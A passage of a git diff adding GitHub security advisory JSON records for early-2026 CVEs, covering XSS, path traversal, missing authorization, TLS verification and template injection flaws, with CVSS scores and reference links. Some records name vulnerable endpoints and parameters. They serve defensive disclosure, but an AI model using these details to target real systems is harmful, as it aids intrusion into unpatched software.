"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2529" + }, + { + "type": "WEB", + "url": "https://github.com/MRAdera/IoT-Vuls/blob/main/wavlink/wn579a3/DeleteMac.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346117" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346117" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.748076" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74", + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T02:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xm63-5pjx-vrhp/GHSA-xm63-5pjx-vrhp.json b/advisories/unreviewed/2026/02/GHSA-xm63-5pjx-vrhp/GHSA-xm63-5pjx-vrhp.json new file mode 100644 index 0000000000000..1b39d8c9de258 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xm63-5pjx-vrhp/GHSA-xm63-5pjx-vrhp.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xm63-5pjx-vrhp", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2026-26157" + ], + "details": "A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26157" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-26157" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439039" + }, + { + "type": "WEB", + "url": "https://git.busybox.net/busybox/commit/archival?id=3fb6b31c716669e12f75a2accd31bb7685b1a1cb" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xm99-mgxp-q9jf/GHSA-xm99-mgxp-q9jf.json b/advisories/unreviewed/2026/02/GHSA-xm99-mgxp-q9jf/GHSA-xm99-mgxp-q9jf.json new file mode 100644 index 0000000000000..6e96e65be87a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xm99-mgxp-q9jf/GHSA-xm99-mgxp-q9jf.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xm99-mgxp-q9jf", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25406" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the organization parameter. Attackers can send POST requests to the korugan/cmclient endpoint with script payloads in the organization parameter to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25406" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-organization-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmhh-hhw2-rh9j/GHSA-xmhh-hhw2-rh9j.json b/advisories/unreviewed/2026/02/GHSA-xmhh-hhw2-rh9j/GHSA-xmhh-hhw2-rh9j.json new file mode 100644 index 0000000000000..9d756314253fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xmhh-hhw2-rh9j/GHSA-xmhh-hhw2-rh9j.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xmhh-hhw2-rh9j", + "modified": "2026-02-13T21:31:38Z", + "published": "2026-02-13T21:31:38Z", + "aliases": [ + "CVE-2025-36523" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36523" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json b/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json new file mode 100644 index 0000000000000..941324951717b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xmr6-mm5f-8mf2/GHSA-xmr6-mm5f-8mf2.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xmr6-mm5f-8mf2", + "modified": "2026-02-12T18:30:21Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-59386" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59386" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json b/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json index 2f1544cedb5f8..e123782ab47cf 100644 --- a/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json +++ b/advisories/unreviewed/2026/02/GHSA-xmrx-grvp-76w7/GHSA-xmrx-grvp-76w7.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xmx2-52xv-386p/GHSA-xmx2-52xv-386p.json b/advisories/unreviewed/2026/02/GHSA-xmx2-52xv-386p/GHSA-xmx2-52xv-386p.json new file mode 100644 index 0000000000000..5510e9bd4de53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xmx2-52xv-386p/GHSA-xmx2-52xv-386p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xmx2-52xv-386p", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14427" + ], + "details": "The Shield Security: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `MfaEmailDisable` action in all versions up to, and including, 21.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable the global Email 2FA setting for the entire site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14427" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3439494%40wp-simple-firewall&new=3439494%40wp-simple-firewall&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91dbc521-c24b-4b73-9b70-46d363ccb535?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json new file mode 100644 index 0000000000000..0af14e86b4560 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xmxf-f859-45ch", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25333" + ], + "details": "Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through <= 1.0.11.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25333" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/shopwell/vulnerability/wordpress-shopwell-theme-1-0-11-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json b/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json new file mode 100644 index 0000000000000..76c43cf9b047c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xp29-43pm-7r9g/GHSA-xp29-43pm-7r9g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp29-43pm-7r9g", + "modified": "2026-02-12T15:32:47Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2025-15573" + ], + "details": "The affected devices do not validate the server certificate when connecting to the SolaX Cloud MQTTS server hosted in the Alibaba Cloud (mqtt001.solaxcloud.com, TCP 8883). This allows attackers in a man-in-the-middle position to act as the legitimate MQTT server and issue arbitrary commands to devices.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15573" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/solax" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T11:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json new file mode 100644 index 0000000000000..43ef0684817b8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xp6f-p933-2gqg", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T18:30:23Z", + "aliases": [ + "CVE-2026-26214" + ], + "details": "Galaxy FDS Android SDK (XiaoMi/galaxy-fds-sdk-android) version 3.0.8 and prior disable TLS hostname verification when HTTPS is enabled (the default configuration). In GalaxyFDSClientImpl.createHttpClient(), the SDK configures Apache HttpClient with SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER, which accepts any valid TLS certificate regardless of hostname mismatch. Because HTTPS is enabled by default in FDSClientConfiguration, all applications using the SDK with default settings are affected. This vulnerability allows a man-in-the-middle attacker to intercept and modify SDK communications to Xiaomi FDS cloud storage endpoints, potentially exposing authentication credentials, file contents, and API responses. The XiaoMi/galaxy-fds-sdk-android open source project has reached end-of-life status.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26214" + }, + { + "type": "WEB", + "url": "https://github.com/XiaoMi/galaxy-fds-sdk-android" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xiaomi-galaxy-fds-android-sdk-tls-hostname-verification-disabled-enables-mitm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-297" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T16:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xph2-5pq4-m7jp/GHSA-xph2-5pq4-m7jp.json b/advisories/unreviewed/2026/02/GHSA-xph2-5pq4-m7jp/GHSA-xph2-5pq4-m7jp.json new file mode 100644 index 0000000000000..9ae35c744842b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xph2-5pq4-m7jp/GHSA-xph2-5pq4-m7jp.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xph2-5pq4-m7jp", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2025-71203" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: Sanitize syscall table indexing under speculation\n\nThe syscall number is a user-controlled value used to index into the\nsyscall table. Use array_index_nospec() to clamp this value after the\nbounds check to prevent speculative out-of-bounds access and subsequent\ndata leakage via cache side channels.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71203" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/25fd7ee7bf58ac3ec7be3c9f82ceff153451946c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8b44e753795107a22ba31495686e83f4aca48f36" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c45848936ebdb4fcab92f8c39510db83c16d0239" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json new file mode 100644 index 0000000000000..de22b2120f16e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpp8-qpcr-c3rg", + "modified": "2026-02-17T21:31:13Z", + "published": "2026-02-13T21:31:39Z", + "aliases": [ + "CVE-2026-2441" + ], + "details": "Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2441" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/483569511" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-2441" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:17:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json new file mode 100644 index 0000000000000..a5f3bc22e464e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xprw-mh67-9xf5", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23544" + ], + "details": "Deserialization of Untrusted Data vulnerability in codetipi Valenti valenti allows Object Injection.This issue affects Valenti: from n/a through <= 5.6.3.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23544" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/valenti/vulnerability/wordpress-valenti-theme-5-6-3-5-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xq5p-rr5f-vjc5/GHSA-xq5p-rr5f-vjc5.json b/advisories/unreviewed/2026/02/GHSA-xq5p-rr5f-vjc5/GHSA-xq5p-rr5f-vjc5.json new file mode 100644 index 0000000000000..5a423b07f3556 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xq5p-rr5f-vjc5/GHSA-xq5p-rr5f-vjc5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq5p-rr5f-vjc5", + "modified": "2026-02-16T18:31:28Z", + "published": "2026-02-16T18:31:28Z", + "aliases": [ + "CVE-2026-2564" + ], + "details": "A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T. Affected by this vulnerability is an unknown functionality of the file /OutsideCmd. The manipulation results in weak password recovery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitation appears to be difficult. It is recommended to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2564" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346171" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346171" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.741776" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-640" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T17:18:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xq5r-rwpv-6jwc/GHSA-xq5r-rwpv-6jwc.json b/advisories/unreviewed/2026/02/GHSA-xq5r-rwpv-6jwc/GHSA-xq5r-rwpv-6jwc.json new file mode 100644 index 0000000000000..f4f1cbcecf54d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xq5r-rwpv-6jwc/GHSA-xq5r-rwpv-6jwc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq5r-rwpv-6jwc", + "modified": "2026-02-15T15:31:31Z", + "published": "2026-02-15T15:31:31Z", + "aliases": [ + "CVE-2019-25373" + ], + "details": "OPNsense 19.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input to the category parameter. Attackers can send POST requests to firewall_rules_edit.php with script payloads in the category field to execute arbitrary JavaScript in the browsers of other users accessing firewall rule pages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25373" + }, + { + "type": "WEB", + "url": "https://forum.opnsense.org/index.php?topic=11469.0" + }, + { + "type": "WEB", + "url": "https://opnsense.org" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46351" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/opnsense-stored-xss-via-firewallruleseditphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xq7w-6f6f-mh93/GHSA-xq7w-6f6f-mh93.json b/advisories/unreviewed/2026/02/GHSA-xq7w-6f6f-mh93/GHSA-xq7w-6f6f-mh93.json new file mode 100644 index 0000000000000..de5353d16c8ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xq7w-6f6f-mh93/GHSA-xq7w-6f6f-mh93.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq7w-6f6f-mh93", + "modified": "2026-02-17T18:32:57Z", + "published": "2026-02-17T18:32:57Z", + "aliases": [ + "CVE-2025-70830" + ], + "details": "A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70830" + }, + { + "type": "WEB", + "url": "https://github.com/running-elephant/datart" + }, + { + "type": "WEB", + "url": "https://github.com/xiaoxiaoranxxx/CVE-2025-70830" + }, + { + "type": "WEB", + "url": "https://portswigger.net/web-security/server-side-template-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T16:20:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json new file mode 100644 index 0000000000000..44a5357ce56be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqcm-jrw9-wq72", + "modified": "2026-02-18T21:31:18Z", + "published": "2026-02-13T00:32:51Z", + "aliases": [ + "CVE-2025-14282" + ], + "details": "A flaw was found in Dropbear. When running in multi-user mode and authenticating users, the dropbear ssh server does the socket forwardings requested by the remote client as root, only switching to the logged-in user upon spawning a shell or performing some operations like reading the user's files. With the recent ability of also using unix domain sockets as the forwarding destination any user able to log in via ssh can connect to any unix socket with the root's credentials, bypassing both file system restrictions and any SO_PEERCRED / SO_PASSCRED checks performed by the peer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14282" + }, + { + "type": "WEB", + "url": "https://github.com/mkj/dropbear/pull/391" + }, + { + "type": "WEB", + "url": "https://github.com/mkj/dropbear/pull/394" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14282" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420052" + }, + { + "type": "WEB", + "url": "https://lists.ucc.gu.uwa.edu.au/pipermail/dropbear/2025q4/002390.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/12/16/4" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2025/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xqfh-gx6q-m574/GHSA-xqfh-gx6q-m574.json b/advisories/unreviewed/2026/02/GHSA-xqfh-gx6q-m574/GHSA-xqfh-gx6q-m574.json new file mode 100644 index 0000000000000..06ee1c8db6d20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xqfh-gx6q-m574/GHSA-xqfh-gx6q-m574.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xqfh-gx6q-m574", + "modified": "2026-02-12T06:30:13Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2026-26085" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26085" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T05:17:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xqpr-gx4w-53xf/GHSA-xqpr-gx4w-53xf.json b/advisories/unreviewed/2026/02/GHSA-xqpr-gx4w-53xf/GHSA-xqpr-gx4w-53xf.json new file mode 100644 index 0000000000000..b9e92db156529 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xqpr-gx4w-53xf/GHSA-xqpr-gx4w-53xf.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": 